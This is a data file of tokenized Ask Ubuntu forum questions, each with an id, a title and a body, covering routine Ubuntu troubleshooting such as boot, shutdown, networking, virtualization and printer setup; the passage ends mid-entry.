392156	share a shared drive to client vm from server	i have setup a intranet in my system for study purpose . i have shared a folder in host physical machine to server vm . now i want that shared drive to be available for other clients vm which are connected to this server vm . how can i achieve this ?
392157	how to identify ubuntu 's release version via the gui ?	i can identify windows ' releases very easily even after the login process is over . ubuntu 's desktops are similar between releases . is it possible to identify the release by looking at ubuntu 's default wallpaper / desktop ?
392158	connect android device	i 've a phone with android and i use ubuntu in my pc . the thing is that i can connect my phone through usb and ubuntu can read it , i mean , i can see the files and stuff , but that 's it . i ca n't transfer files without broking them , ca n't view photos either , and all the things that i can do with windows are gone when using ubuntu or any linux distro . maybe i 'm missing drivers , the phone is samsung . can anyone help me ? i 've search a lot but could n't find a solution . thanks .
392168	why gedit is not opening a file from terminal ?	i 've a ubuntu 12.04 vps with no graphical environment installed . in that vps , i 'm trying to open a file from terminal using gedit with this command gedit config/database.yml but unfortunately it is showing following error ( process:3790 ) : gtk-warning ** : locale not supported by c library . using the fallback 'c ' locale . can not open display : run 'gedit -- help ' to see a full list of available command line options . how can i solve this problem ?
392169	adding gmail from online accounts in ubuntu 13.10	i noticed that in the `` online accounts '' application that you can add gmail , yahoo etc and it says you can add your email . especially for the gmail it says under it `` includes gmail , google+ , picasa , google docs etc ... '' goes not add your gmail account to the local machine anymore ?
392172	how to uninstall vms installed with ubuntu-vm-builder	how do i list ( and uninstall ) vms installed with ubuntu-vm-builder but not with virsh ? details whilst following this guide , i was keen to get started and typed in : sudo ubuntu-vm-builder kvm precise before seeing the note about how it is important to add this option : -- libvirt=qemu : ///system if i want to be able to manage it with virsh . now it is installed , i have no idea how to list what i have installed or where it is . i want to undo what i 've done ( uninstall the vm ) so that i can install it with that option so that i can manage it with virsh . all the tutorials i found use virsh so i do n't know how to uninstall what i have installed
392180	ubuntu server/samba file sharing disconnection during use	i apologise in advance if i include needless information ; firstly my network is setup with ubuntu server 12.04 lts - > netgear modem router - > ethernet cable - > belkin router as wireless access point - > main computer ( win7 ) and laptop ( win8 ) connected here . so i installed and setup webmin and samba , and had to mount my 4 existing ntfs hard drives ( full of content ) . i then used webmins samba windows file shares to share the mounted hard drives . when i go to my windows computers i am able to see the fileserver , and see all the mounted shares ; as well as access webmin . however , as an example , when i start playing a video off the server on the windows computers after a time ranging from 1 to 10 minutes , the server disconnects . and then i can no longer log into webmin through browser either . however if at the same time one of the computers stops working , i can go to the other computer and still log into webmin . i am often trying to play a video on the main computer before i lose complete access to the fileserver , but then i can log into webmin on the other computer ? i have absolutely no idea what might be causing this issue so any ideas would be greatly appreciated !
392181	how to boot from a different partition	i have ubuntu 10.04 installed and tried to upgrade to 12.04 . this failed partially because of low diskspace . 12.04 is installed and does boot , but apt-get gives strange errors and complains that some packages are not installed ( memtest86+ , ubuntu-standard , apache2.2-common , apache2-mpm-prefork , apache2 , libapache2-mod-perl2 , libapache2-mod-php5 , libapache2-mod-scgilibapache2-reload-perl , php5 , snmpd ) . i do have a backup partition which should boot ( copied it 1:1 with dd ) in /dev/sda3 , but how do i boot from this partition ?
392182	ubuntu 13.10 wo n't shutdown/restart	i installed the 'new ' ubuntu 13.10 , and it wo n't shutdown/restart from the menu . when pressing any of those buttons , ubuntu will close some programs and then do nothing . the only way that i 've to shutdown/restart my pc is by blocking it , then moving the mouse so the black screen goes away , then changing user , and finally shutdown/restart from the login screen . anyway that i can fix this ? thanks .
392188	keep smart scopes settings set	i recently upgraded to 13.10 saucy salamander and as most of us know , it is the first ubuntu version to truly use smart scopes . while this is useful and i do like parts of it , i do n't want all of the results it brings . so , i went over to the filter results bar and changed it to what i wanted ( it was giving me online results over searching my computer and such , such not even bringing up firefox when i searched for it ) and then started the program i wanted . later i went back to search and all of those specifications i made were gone . it was bringing up online results first again and all of the defaults i had turned off were back on . here 's a screenshot of what is happening : i do n't completely want to remove scopes , as i have heard this can cause problems , but i really would like the functionality i need . also , when i go to , say the applications scope , it just shows this : i ca n't browse my applications ! please help me , as i really do n't want to remove scopes or even down-grade to 13.04 !
392190	wicd network manager tray icon not showing ubuntu 13.10 unity 7.1.2	after successfully installing wicd in ubuntu 13.10 saucy salamander which was a real chore . i now am curious to know if wicd network manager supports a tray icon and if so how do i edit the gsettings whitelist correctly for my distro ? note dconf editor is already installed on my machine
392191	ubuntu 13.10 remote desktop sharing will not accept keyboard or mouse input	any suggestings on how to get keyboard and mouse working through remote desktop sharing ? this was working before i updated ati video driver for linux x64 . now when i remote access using tightvnc or realvnc . i can enter password and login to ubuntu but once on the desktop the mouse will move around . but if i click or use keyboard there is nothing on the screen . however , if it close the vnc viewer and reopen the last action or click i did shows up on the screen . however , nothing else responds . but again it if close and reopen vnc viewer , the last click or keyboard key shows on the screen . is this just bug in the video driver ?
392192	problem formatting usb drive	i am unable to format a usb drive . i tried changing the permissions by using the command below : /media $ sudo chmod 777 f84e-1690 '' f84e-1690 '' is the drive name . but it gives below message : chmod : changing permissions of `f84e-1690 ' : read-only file system can anybody help me please ?
392195	how to deal with unmet dependencies when installing packages ?	i 'm trying to install tmux , but getting this error . i 'm also curious to how to resolve such issues as this comes up pretty often when installing these packages sometimes . when it says depends on a specific package . does that mean its missing and you have to install it before you can install the wanted package ( tmux in my case ) . but if i wanted to install the missing dependency ( linux-headers-3.2.0-53-virtual ) i get an error too . -- sudo apt-get install linux-headers-3.2.0-53-virtual sudo apt-get -f install tmux reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-headers-virtual : depends : linux-headers-3.2.0-53-virtual but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
392197	run a specific sudo command without a password in ubuntu 13.10	i would like to run vagrant without being prompted for a password . as this post suggests , i used visudo to add the following line to my sudoers file . john-moz all= ( all ) nopasswd : /usr/bin/vagrant this does not seem to work . i am still prompted for a password when using vagrant . am i doing something wrong ?
392200	npm completion broken	i 'm running npm 1.2.18 and node v0.10.15 . npm completion is broken . if i try to tab complete with npm or if i run npm completion , it displays : npm err ! system linux 3.11.0-14-generic npm err ! command `` /usr/bin/nodejs '' `` /usr/bin/npm '' `` completion '' `` -- color '' `` false '' `` -- loglevel '' `` error '' `` -- '' `` npm '' `` comple '' npm err ! cwd /home/ajcrites npm err ! node -v v0.10.15 npm err ! npm -v 1.2.18 npm err ! path /usr/share/npm/lib/utils/completion.sh npm err ! code enoent npm err ! errno 34 indeed , /usr/share/npm/lib/utils/completion.sh does not exist , and the current directory gets an npm-debug.log file with similar information . a google search reveals a lot of complaints about this issue for varying versions of node/debian/zsh . if i use bash , tab completion works , but npm completion yields the same error about the missing file . as far as i can tell , none of the threads that you can easiliy find from the search actually have a solution . they just seem to be bug reports . is there anything i can do to fix this error ? is there an example completion.sh i can use or something ?
392201	ram upgrade causes firefox , compiz crashes , even kernel panic on hp pavilion	i use a hp pavilion dv6500 , and i recently upgraded my ram on my laptop from 1g to 4g , but i keep getting random issues . here are a few : when watching youtube videos / vlc videos after a long period of time , the whole system will crash and kernel panic ( i ca n't ctrl+alt+f1 to a new terminal , caps lock light flashing ) firefox will crash randomly compiz has `` crashed '' once or twice , not sure if related . nautilus has crashed networkmanager no longer saves my wifi password ( possibly unrelated ) i thought it might be my memory controller , so i did an lshw and found that there was an nvidia memory controller that was unclaimed . it 's called mcp67 memory controller . after a google search , i found a link to a similar problem on gentoo . so i went into the bios and did a memory test , but it passed . on the article above , it talks about adjusting dram timings , but my bios does n't have such a feature . is this typical for a quick-and-dirty ram upgrade ? should i reinstall ubuntu / would that help ? any advice would be greatly appreciated . thank you !
392203	juju `` regionone '' does not allow access to all required services	hi i am trying to configure juju over openstack under ubuntu . successfully configure the basic authentication stuff on juju enviroment.yalm but when i try to bootstrap juju this errors stop me . anyone can give me a tip ? error error failed to get object provider-state from container juju-ed085dd894094e7997f2e285ed52ca28 caused by : can not create service urls caused by : the configured region `` regionone '' does not allow access to all required services , namely : compute , object-store access to these services is missing : object-store config openstack : type : openstack admin-secret : xxxx control-bucket : juju-ed085dd894094e7997f2e285ed52ca28 auth-url : http : //xxxx.11:5000/v2.0 auth-mode : userpass username : xxx password : xxx tenant-name : admin region : regionone
392207	command to know my external ip address ?	how can i get my external ip address using the command line ?
392208	`` warning no tools available , attempting to retrieve from amazonaws '' while bootstraping	i have installed maas server with dhcp and dns . next i added two nodes , they turned green . however , when i use juju bootstrap there is an error : warning no tools available , attempting to retrieve from https : //juju-dist.s3.amazonaws.com/ the images are downloaded and juju starts the nodes and installs ubuntu on them , but after the installation is finished the screen turns black and there is no action . in the web interface the nodes are blue and there is 2 nodes allocated . the nodes are allocated to my profile name . when i run juju status the command hangs and nothing happens . can you please give me some advices ? thanks you are the best ! hello and thanks for the answer you are the best . but now i have this : environment : maas machines : `` 0 '' : agent-state : started agent-version : 1.16.3.1 dns-name : nkdbe.master instance-id : /maas/api/1.0/nodes/node-650ff85c-6884-11e3-a0ea-002590925e2e/ series : precise `` 1 '' : agent-state : started agent-version : 1.16.3.1 dns-name : pat7e.master instance-id : /maas/api/1.0/nodes/node-7d7afc70-688e-11e3-98cd-002590925e2e/ series : precise services : juju-gui : charm : cs : precise/juju-gui-81 exposed : true units : juju-gui/0 : agent-state : started agent-version : 1.16.3.1 machine : `` 1 '' open-ports : - 80/tcp - 443/tcp public-address : pat7e.master when i try to open pat7e.master in a web browser no address found . what should i do ? hello i have installed juju and now i 'm trying to install juju gui . when i write juju status : agent-state : started agent-version : 1.16.3.1 dns-name : 7dbb8.master instance-id : /maas/api/1.0/nodes/node-66915cbe-67d7-11e3-bea0-002590925e2e/ series : precise `` 1 '' : agent-state-info : ' ( error : can not run instances : gomaasapi : got error back from server : 409 conflict ) ' instance-id : pending series : precise services : juju-gui : charm : cs : precise/juju-gui-81 exposed : true units : juju-gui/0 : agent-state : pending machine : `` 1 '' i 've got this . can you please give me advice what kind of error is this and how can i fix it ? thanks .
392212	ubuntu 13.04 misssing resolution	my ubuntu 13.04 installation has only 2 options for its resolution 640x480 800x600 after the check with command xrandr in the terminal xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 800 x 600 , maximum 800 x 600 default connected 800x600+0+0 0mm x 0mm 800x600 0.0* 640x480 60.0 1440x900_59.90 ( 0x190 ) 108.3mhz h : width 1440 start 1520 end 1672 total 1904 skew 0 clock 55.8khz v : height 900 start 901 end 904 total 932 skew clock 59.9hz 1368x768_16.90 ( 0.191 ) 19.4mhz h : width 1368 start 1304 end 1424 total 1480 skew 0 clock 13.1khz v : height 768 start 769 end 722 total 766 skew clock 16.9hz how to fix this and add the resolution in system settings > displays > resolution please help me .
392214	postgresql installation on ubuntu 12.04	i have trouble installing postgresql with apt . postgresql-9.1 ( or postgresql-9.3 ) installation fails with : * starting postgresql 9.1 database server * error : could not exec /usr/lib/postgresql/9.1/bin/pg_ctl /usr/lib/postgresql/9.1/bin/pg_ctl start -d /var/lib/postgresql/9.1/main -l /var/log/postgresql/postgresql-9.1-main.log -s -o -c config_file= '' /etc/postgresql/9.1/main/postgresql.conf '' : [ fail ] invoke-rc.d : initscript postgresql , action `` start '' failed . when i try executing /usr/lib/postgresql/9.1/bin/pg_ctl /usr/lib/postgresql/9.1/bin/pg_ctl start -d /var/lib/postgresql/9.1/main -l /var/log/postgresql/postgresql-9.1-main.log -s -o -c config_file= '' /etc/postgresql/9.1/main/postgresql.conf '' directly , it fails with : /usr/lib/postgresql/9.1/bin/pg_ctl : symbol lookup error : /usr/lib/postgresql/9.1/bin/pg_ctl : undefined symbol : pqping here is my system information : $ uname -a linux daclin 3.2.0-23-generic # 36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 x86_64 x86_64 gnu/linux would you have any idea on what is going on ?
392215	13.10 shutdown/restart issue	i have a clean install of 13.10 using the 3.12 kernel . when i shutdown or restart the process hangs . i press a key and i see : **killing all remaining processes ... ... . [ fail ] ** ( fail is in red ) this is followed by more info ( sometime referring to nmdispatcher or modem and always ends : mount : / is busy will now restart ( or halt as the case may be ) then nothing else happens the process hangs there , power on my pc ( dell 5150 desktop ) remains on and i need to do a `` hard reset '' to turn my pc off . i have seen relatively similar problems but none match mine exactly , i have attempted using : sudo shutdown -p now or sudo shutdown -h now but the results are the same . i am concerned that this unclean shutdown may cause problems and i would like to know how to solve the problem . can anybody help me ? i am not too experienced with ubuntu and i 'm stuck ... thanks
392216	problem installing linux on new laptop	there is problem installing linux ( ubuntu , debian , opensuse and others ) on new laptops like asus n76vb-t5012h , asus x75vc-ty006h and msi cr70 2m-206fr . on boot , you 're asked either to try or install but none works . the screen stays grey and you can only turn off the computer . can you help me or tell me if this ( new ) problem is known ?
392219	404 error while trying to upgrade	w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/hardy/multiverse/binary-armhf/packages 404 not found [ ip : 91.189.92.200 80 ]
392221	problem with shutdown/restart option	whenever i try to shutdown/restart from the system tab , i am given the option to log out or lock and pressing them does nothing . shutting down from the terminal works fine using commands like shutdown -h and i can shut down through steam big picture . this problem just turned up out from the blue just a few days ago and i have been looking for a fix , but i have just be going round in cycles . help will be appreciated !
392226	how to remove all online smart scopes completely and permanently ?	i want to remove all unitiy scopes , that may access the internet completely and permanently form a pool of many ubuntu 13.10 machines . how to do that ?
392234	unable to install ubuntu12.04 using wubi	i am trying to install ubuntu12.04lts . not being able to install ubuntu using wubi . after running wubi and selecting the drive and passwords etc . , the download starts but following error is displayed : an error occured : ioerror : < urlopenerror ( 7 , 'getaddrinfo failed ' ) > for more information please see the logfile c : \docume~1\owner\locals~1\temp\wubi-12.04.3-rev279.log how to solve this error ? please help me on this . i ca n't able to post full contents of log file . contents of log file is below : 10-11 22:00 info root : === wubi 12.04.3 rev279 === 10-11 22:00 debug root : logfile is c : \docume~1\owner\locals~1\temp\wubi-12.04.3-rev279.log 10-11 22:00 debug root : sys.argv = [ 'main.pyo ' , ' -- exefile= '' c : \\documents and settings\\owner\\desktop\\wubi.exe '' ' ] 10-11 22:00 debug commonbackend : data_dir=c : \docume~1\owner\locals~1\temp\pyl8e.tmp\data 10-11 22:00 debug windowsbackend : 7z=c : \docume~1\owner\locals~1\temp\pyl8e.tmp\bin\7z.exe 10-11 22:00 debug windowsbackend : startup_folder=c : \documents and settings\all users\start menu\programs\startup 10-11 22:00 debug commonbackend : fetching basic info ... 10-11 22:00 debug commonbackend : original_exe=c : \documents and settings\owner\desktop\wubi.exe 10-11 22:00 debug commonbackend : platform=win32 10-11 22:00 debug commonbackend : osname=nt 10-11 22:00 debug commonbackend : language=en_us 10-11 22:00 debug commonbackend : encoding=cp1252 10-11 22:00 debug windowsbackend : arch=amd64 10-11 22:00 debug commonbackend : parsing isolist=c : \docume~1\owner\locals~1\temp\pyl8e.tmp\data\isolist.ini 10-11 22:00 debug commonbackend : adding distro xubuntu-i386 10-11 22:00 debug commonbackend : adding distro edubuntu-i386 10-11 22:00 debug commonbackend : adding distro xubuntu-amd64 10-11 22:00 debug commonbackend : adding distro kubuntu-amd64 10-11 22:00 debug commonbackend : adding distro mythbuntu-i386 10-11 22:00 debug commonbackend : adding distro edubuntu-amd64 10-11 22:00 debug commonbackend : adding distro ubuntu-amd64 10-11 22:00 debug commonbackend : adding distro lubuntu-i386 10-11 22:00 debug commonbackend : adding distro ubuntu-i386 10-11 22:00 debug commonbackend : adding distro mythbuntu-amd64 10-11 22:00 debug commonbackend : adding distro kubuntu-i386 10-11 22:00 debug commonbackend : adding distro lubuntu-amd64 10-11 22:00 debug windowsbackend : fetching host info ... 10-11 22:00 debug windowsbackend : registry_key=software\microsoft\windows\currentversion\uninstall\wubi 10-11 22:00 debug windowsbackend : windows version=xp 10-11 22:00 debug windowsbackend : windows_version2=microsoft windows xp 10-11 22:00 debug windowsbackend : windows_sp=service pack 3 10-11 22:00 debug windowsbackend : windows_build=2600 10-11 22:00 debug windowsbackend : gmt=5 10-11 22:00 debug windowsbackend : country=us 10-11 22:00 debug windowsbackend : timezone=america/new_york 10-11 22:00 debug windowsbackend : windows_username=owner 10-11 22:00 debug windowsbackend : user_full_name=owner 10-11 22:00 debug windowsbackend : user_directory=c : \documents and settings\owner 10-11 22:00 debug windowsbackend : windows_language_code=1033 10-11 22:00 debug windowsbackend : windows_language=english 10-11 22:00 debug windowsbackend : processor_name=intel ( r ) pentium ( r ) dual cpu e2140 @ 1.60ghz 10-11 22:00 debug windowsbackend : bootloader=xp 10-11 22:00 debug windowsbackend : system_drive=drive ( c : hd 6105.2265625 mb free ntfs ) 10-11 22:00 debug windowsbackend : drive=drive ( c : hd 6105.2265625 mb free ntfs ) 10-11 22:00 debug windowsbackend : drive=drive ( d : hd 38637.5 mb free fat32 ) 10-11 22:00 debug windowsbackend : drive=drive ( e : hd 8747.6875 mb free fat32 ) 10-11 22:00 debug windowsbackend : drive=drive ( f : hd 24030.09375 mb free fat32 ) 10-11 22:00 debug windowsbackend : drive=drive ( g : cd 0.0 mb free ) 10-11 22:00 debug windowsbackend : drive=drive ( h : cd 0.0 mb free cdfs ) 10-11 22:00 debug windowsbackend : drive=drive ( i : removable 0.0 mb free ) 10-11 22:00 debug windowsbackend : uninstaller_path=none 10-11 22:00 debug windowsbackend : previous_target_dir=none 10-11 22:00 debug windowsbackend : previous_distro_name=none 10-11 22:00 debug windowsbackend : keyboard_id=67699721 10-11 22:00 debug windowsbackend : keyboard_layout=us full log file can be viewed at http : //pastebin.com/18szhpz0
392240	ubuntu studio does n't boot properly	i installed ubuntu studio 13.10 from within a live usb stick , and i installed it alongside windows . however , when i boot up my computer now , i only get a bare shell with the following text : gnu grub version 2.00-19ubuntu2.1 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . grub > if i type 'exit , ' i 'm dropped into what i 'm assuming is my laptop 's bios , and i can boot into windows from there . ( and i can still boot from the live usb too ) i 've done some research , but it seems as though every case is entirely unique . ( in other words : none of the 'duplicate ' answers seem to apply to my situation . ) edit 1 : the computer is a toshiba satellite c55-a . one 700gb hard drive , and a dual core pentium processor . 5.7gib ram ... i downloaded the iso supplied for ubuntu studio , and used unetbootin to send it to the usb stick and make it bootable . edit 2 : the answer from the question demortes suggested ( at ubuntu 13.10 grub 2.0 ) worked , and i was able to boot into ubuntu . i suspect that the problem itself is n't fixed , though , and i hope someone can help me with a more permanent solution ? still , i 'm in , and that 's good !
392242	acer c720p touch screen	i was wondering if anyone has gotten the touch screen working on the acer c720p chromebook yet ? i have looked online and have not been able to find any information on it yet . thanks !
392246	cloning my hard drive .	2 weeks ago i installed ubuntu and after my back-up hard drive failing i moved all my data onto the hard drive too . i have a mac laptop and now my replacement hard drive has arrived . i was wondering if it were possible to connect my mac to the old hard and transfer data ( install , settings and all ) to the new one . is this possible ? it would be really good if it was just a simple cloning process as i have my desktop , application and settings all running correctly .
392248	where can i find the ubuntu-touch 14.04 changelogs	i am trying to find the changelogs for the ubuntu touch 14.04 dailys builds . please advise . thanks !
392250	13.10 /etc/init.d/vboxdrv setup ' virtual box issue	when i try to start a virtual box , i get : /etc/init.d/vboxdrv setup i tried removing it then reinstalling virtual box , then reinstalling ubuntu to 13.10 what do i do to fix this problem ?
392254	ubuntu install hangs at `` installing the 'grub2 ' package ... ''	so i 'm trying to install ubuntu on my laptop , it seems to work fine until it tries to install grub . i have n't seen progress the past hour and this is the second attempt . i 'm trying to install 13.10 , using a linux live usb . i do n't care about the contents of the laptop . i 've been trying to find instructions about installing grub before starting the installation , hoping that would solve my issues , but i came up empty . laptop is 2 years old , it used to run dual-boot windows 7 and ubuntu . i 'm now doing a fresh install of just ubuntu . i hope anyone knows how i can find out why it is happening .
392256	how do i change the 0 [ ins ] key to an actual 0 ?	when i press zero on the number pad it opens the 4 work spaces as a shortcut . how do i change that to zero ?
392262	how to monitor the memory consumed by a process ?	i have a process that i would like to see how much memory it consumes while it is running . right now i do this : ps faux | grep casper but that just gives me the information of that moment . it would be nice to see that value changing as the script proceeds . any way i can do this ?
392266	why is the partition not accessible ?	i created a new ext4 partition /dev/sda3 on my system using gparted . i also added following line to the bottom of my fstab : /dev/sda3 /home ext4 defaults 0 0 but upon reboot , my user 's directory ( /home/reg/ ) , does n't exist ! why not , where has it gone ? mount shows me following : $ mount /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/cgroup type tmpfs ( rw ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) none on /sys/fs/pstore type pstore ( rw ) systemd on /sys/fs/cgroup/systemd type cgroup ( rw , noexec , nosuid , nodev , none , name=systemd ) gvfsd-fuse on /run/user/104/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=lightdm ) /dev/sda3 on /home type ext4 ( rw ) $ please advise !
392268	12.04 unity - windows consistently jump behind main menu bar	i have run a clean install of ubuntu 12.04 lts and installed all the latest updates , and have not made any alterations to the interface . however i am presented with a persistent problem : when using multiple applications or windows , when returning to a previously used application by clicking on the left side icon , i often find that entire folders/browser windows , have been moved above the unity bar , sometimes past the point of retrieval . i understand that in most circumstances pressing alt will drag the window back into place . however , after a few minutes when i return to the application , i find that invariably the window has been moved back off screen . this time wasting error may seem innocuous , but multiply it by several command lines , browser windows , editors and the like , the task of ferrying logic between windows becomes much more arduous when one has to hunt and physically retrieve the proper screen from it 's hiding place . is there a mechanism that i have overlooked that may be causing this behaviour ?
392272	install method `` something else '' unsable device	so i am trying to install ubuntu via the `` something else '' method . i have a 750gb hdd with 286gb used for window 7 the other part of the hdd is broken up into separate drives but is grouped together and is listed as unusable the 453gb is divided into three drives in windows 20gb ntfs 20gb raw 410gb ntfs with data on it why does is it not detecting the spare disk space as usable ? will i be able to install ubuntu along side my windows 7 using this method ? i want to install ubuntu on one of the 20gb drives i created .
392279	kernel panic - not syncing - attempted to kill init	a few days ago i have done the upgrade . and now i ca n't boot . i tried to resinstall the kernel , but theres no effect , also looked a few similar questions but they did n't helled me . myebe someone have such problem ?
392280	how to use ffmepg codecs on ubuntu	i want to play .wmv files on ubuntu , but it seems these files are proprietary and are not playable under windows . so downloaded the ffmpeg source code and compiled it . now , ffmplay is able to play .wmv files . i want to know how i can use ffmpeg codecs with vlc player , or with ubuntu 's default video player .
392288	how can i make tvtime find my mixer ?	i am using a winfast leadtek tv 2000 xp card and tvtime 1.0.2 to watch analog tv . the tv card 's sound output is hooked up to the cd-in of my mainboard ( msi intel x58 platinum ) . just recently i managed to get alsa to correctly recognize the cd-in ( see how do i enable cd-in ? ) . now i would like tvtime to adjust the alsa cd slider when turning the volume up and down in tvtime . however , tvtime refuses to do this and i always have to use alsamixer to control the volume . i have tried different settings for the mixerdevice setting in the tvtime.xml configuration file as suggested e.g . in http : //askubuntu.com/a/217462/9598 . when using this value , this is the output when running tvtime : running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/chrisipk/.tvtime/tvtime.xml alsa lib control.c:953 : ( snd_ctl_open_noupdate ) invalid ctl mixer : attach error : no such file or directory mixer : ca n't open mixer , mixer volume and mute unavailable . this is what i currently have : < option name= '' mixerdevice '' value= '' default/cd '' / > this is the output when running tvtime : running tvtime 1.0.2 . reading configuration from /etc/tvtime/tvtime.xml reading configuration from /home/chris/.tvtime/tvtime.xml mixer : find error : success mixer : ca n't open mixer default , mixer volume and mute unavailable . mixer : ca n't open device default/cd , mixer volume and mute unavailable . the current setting seems to be somewhat right as the output no longer complains about missing a file or directory and contains `` find error : success '' . what do i need to do so that tvtime can adjust my cd-in volume ?
392289	home variable is not set	i have two servers , they 're identical ( i believe ) , production and staging servers . and i have upstart script in /etc/init/ folder . description `` discoure process '' setuid deploy setgid deploy respawn respawn limit 3 30 start on runlevel [ 2345 ] stop on runlevel [ 06 ] script exec /bin/bash < < 'eot' echo \ '' $ home/.rbenv\ '' cd /home/deploy/discourse/current bundle exec bluepill load config/discourse.pill -- no-privileged -- base-dir tmp/bluepill -- logfile log/bluepill.log eot end script on the staging server it works well , but when i 'm running that script on production server then the home variable is empty , the code echo `` $ home/.rbenv '' is evaluating to `` /.rbenv '' what might be a problem here ? thanks
392290	fresh installation running rather sluggish	good day ! today i installed ubuntu on my home desktop ( win 7 is the main os ) . to this day i was running it in a virtual machine , but since i will do some of my work from home i decided to install it as a second os . the problem is that the installation runs rather slow . nothing huge , however , on my work pc which is weaker some simple commands like apt-cache search or the creation of a database are made instantly . same goes for the virtual machine . on this installation though , it takes a second or so for the basic command ( like the apt-cache ) and a couple of seconds for the creation of a database . it is nothing fatal , however it is annoying to some extent and i am wondering what can be causing this . i do not recall seeing any option for limiting the processing power which the pc should be able to use ( in the installation ) . any ideas on what may be causing this ? edit : earlier today i updated everything via the package manager ( sudo apt-get update ) i am not sure if this covers the drivers or not .
392292	need help installing brother hl 2270dw printer	greetings . i am new to linux and ubuntu . i have really tried to install our new printer . i have been working with these instructions from brother : http : //welcome.solutions.brother.com/bsc/public_s/id/linux/en/instruction_prn3.html everything seems ok through step 4 . i do not understand step 5 . if i type /etc/printcap the response is permission denied . if i type : sudo /etc/printcap then the response is command not found . i would be very grateful if someone could help me get this printer installed and working wirelessly .
392294	reinstall ubuntu keeping data	i have done 2 distribution upgrades in the past and each time i ended up with grave problems after that , so i decided not to do any automatic upgrades . however , i do want the newest distribution , since i start to notice my packages being outdated . ( most notably wine ) my plan is to reinstall ( x ) ubuntu on the newest version and i 've gathered some information on how to that . since doing this is critical and anything going wrong could end up in a lot of time spent fixing it ( and potential loss of data ) , i want to make sure i did n't miss anything . here are my assumptions : i have /home on a separate partition . anything on there is safe and reinstalling ubuntu should not affect anything on there . ( except for some dependencies maybe , they should be easy to reinstall if need be ) i have a separate /boot partition . my boot loader can stay the way it is and does not need to be reinstalled . however , i might need to update the configs of grub . i can save and restore all installed packages with these scripts : http : //askubuntu.com/a/99151 ( i am only talking about the first two presented there ) after reinstalling and restoring my package list , the package manager will still know which packages were installed by hand and which were installed as dependency . ( i think i am wrong here ) after reinstalling and restoring my package list , my system will be almost the same as before . what i am losing is any configuration in /etc ( restoring that from a backup of an old version does n't sound like fun , i can do with reconfiguring anything i changed ) and any programs i installed that did n't register themselves with dpkg . ( i actually want that ) what i want to know now , is whether any of my assumptions are wrong or if i missed anything . also , what happens if some of the packages i have installed are not available in the newer distribution ? another thing : which kind of ubuntu should i install for this ? ( i 'm thinking about the server version , since that seems to be the most light-weight kind ) i hope you can help me with this problem .
392295	cheap linux based tablet/convertiblee	so i 've decided that android just wo n't cut it . i need a , preferably cheap linux tablet/laptop convertible . only criteria are that the device should be under $ 300 , and be fully compatible with ubuntu .
392296	how to get rhythmbox stations back !	i accidentally removed the internet radio station hbr1 tronic lounge in the category house from rhythmbox . does anyone know how to get them back ?
392297	can ubislate 7ci be a candidate ?	anyone looking at the ubislate 7ci . it would be worth the cost to me to play around on this device if there is a good chance it would work .
392302	how do i change software center email address ?	i made an error in my email address when setting up software center on new system . i have created an alias . can i either change the address in the software center ( i have made no purchases ) or change the email address to the correct one ?
392305	rsyslog disable $ repeatedmsgreduction for specific filter	i have the following in my rsyslog configuration . it works well . : msg , contains , `` < switch2 > '' /var/log/switch.log & ~ i need to disable repeatedmsgreduction for log messages that are routed by this rule , while leaving it enabled for all other messages . how can i do this ? ( originally asked in serverfault but no responses )
392310	how to create mount point and then mount the directory in all servers ?	i am a linux newbie and i have a very basic question . i have three machines - machinea machineb machinec and all those machines have ubuntu 12.04 installed in it and i have root access to all those three machines . now i am supposed to do below things - create mount point /opt/exhibitor/conf mount the directory in all servers . sudo mount < nfs-server > : /opt/exhibitor/conf /opt/exhibitor/conf/ i have already created /opt/exhibitor/conf directory in all those three machines as mentioned above . now i am not sure how to create mount point /opt/exhibitor/conf and then mount the directory in all three servers ? any thoughts ?
392311	brother wlan scanner dcp-7055w not working ( `` invalid argument '' )	i 'm having trouble getting the scanner of my brother dcp-7055w working over wlan . i 've already installed the official drivers from brother , and the printer itself is working fine . i 've set up the scanner to use a static ip address ( 192.168.002.150 ) . using brother 's brsaneconfig4 i 've added the scanner as follows ( using 002 instead of 2 following this tip ) : brsaneconfig4 -a name=dcp-7055w model=dcp-7055w ip=192.168.002.150 pinging the scanner works fine : $ brsaneconfig4 -p test dcp-7055w ping 192.168.002.150 -w 10 ping 192.168.002.150 ( 192.168.2.150 ) 56 ( 84 ) bytes of data . 64 bytes from 192.168.2.150 : icmp_req=1 ttl=255 time=9.21 ms 64 bytes from 192.168.2.150 : icmp_req=2 ttl=255 time=5.67 ms 64 bytes from 192.168.2.150 : icmp_req=3 ttl=255 time=6.01 ms 64 bytes from 192.168.2.150 : icmp_req=4 ttl=255 time=3.33 ms i 've also made sure that the issue with 64bit drivers is fixed : $ ls -l /usr/lib/sane/libsane-brother4* lrwxrwxrwx 1 root root 35 sep 25 07:18 /usr/lib/sane/libsane-brother4.so - > /usr/lib/sane/libsane-brother4.so.1 lrwxrwxrwx 1 root root 39 sep 25 07:18 /usr/lib/sane/libsane-brother4.so.1 - > /usr/lib/sane/libsane-brother4.so.1.0.7 -rwxr-xr-x 1 root root 129376 sep 25 07:18 /usr/lib/sane/libsane-brother4.so.1.0.7 i 've also fixed the udev rules according to this answer : $ grep saned 